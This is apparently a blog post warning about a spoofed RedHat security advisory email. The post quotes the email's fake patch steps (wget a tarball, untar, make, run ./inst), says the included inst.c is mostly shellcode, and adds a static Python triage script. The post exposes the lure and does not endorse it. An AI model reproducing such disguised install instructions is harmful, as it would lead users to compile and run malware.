Nice spoof

I just got a nice RedHat security advisory email spoof, subject: “RedHat: Buffer Overflow in "ls" and "mkdir"”.

The content was text/html, but the thing that really gave it away, before I started looking in the headers, was this part:

  • First download the patch from the Stanford RedHat mirror: wget
  • Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Thank you very much…

Anyone following these directions deserves what they get. I took a quick look at the code in the inst.c file, which is in the fileutils-1.0.6.patch.tar.gz tarball, and it's mostly shellcode as expected. I have no idea what it does, but it's probably not benign.
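An added illustration, not part of the original post and not the code from the tarball: one way to triage a file like inst.c without compiling or running it is to measure how much of the source consists of escaped-byte string literals. The function names, the `min_run` threshold and the sample source are assumptions constructed for this example.

```python
import re

# C string literal, allowing backslash escapes (including \") inside it.
STRING_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')
# One escaped byte inside a literal: \xNN (hex) or \NNN (octal).
ESCAPED_BYTE = re.compile(r'\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}')

def merged_literals(text):
    """Return literal bodies, joining adjacent ones as the C compiler would."""
    out, prev_end = [], None
    for m in STRING_LITERAL.finditer(text):
        if prev_end is not None and not text[prev_end:m.start()].strip():
            out[-1] += m.group(1)
        else:
            out.append(m.group(1))
        prev_end = m.end()
    return out

def triage_c_source(text, min_run=16):
    """Static check only: nothing is compiled or executed.
    min_run is an assumed threshold; tune it for your own corpus."""
    encoded, longest = 0, 0
    for lit in merged_literals(text):
        hits = ESCAPED_BYTE.findall(lit)
        encoded += sum(len(h) for h in hits)   # source chars spent on escapes
        longest = max(longest, len(hits))      # escaped bytes in one literal
    non_ws = len(re.sub(r'\s', '', text)) or 1
    return {
        "longest_escaped_literal": longest,
        "escaped_fraction": round(encoded / non_ws, 2),
        "suspicious": longest >= min_run,
    }

# Constructed sample, NOT the contents of inst.c; the bytes are inert filler.
SAMPLE = r'''
#include <stdio.h>
char blob[] =
    "\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41";
int main(void) { puts("installing patch..."); return 0; }
'''

if __name__ == "__main__":
    print(triage_c_source(SAMPLE))
```

The literal matcher is a heuristic: it does not strip comments or character literals, so treat a hit as a reason to read the file by hand, not as a verdict.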

I have fileutils-1.0.6.patch.tar.gz and the original email if you want copies, just mail me.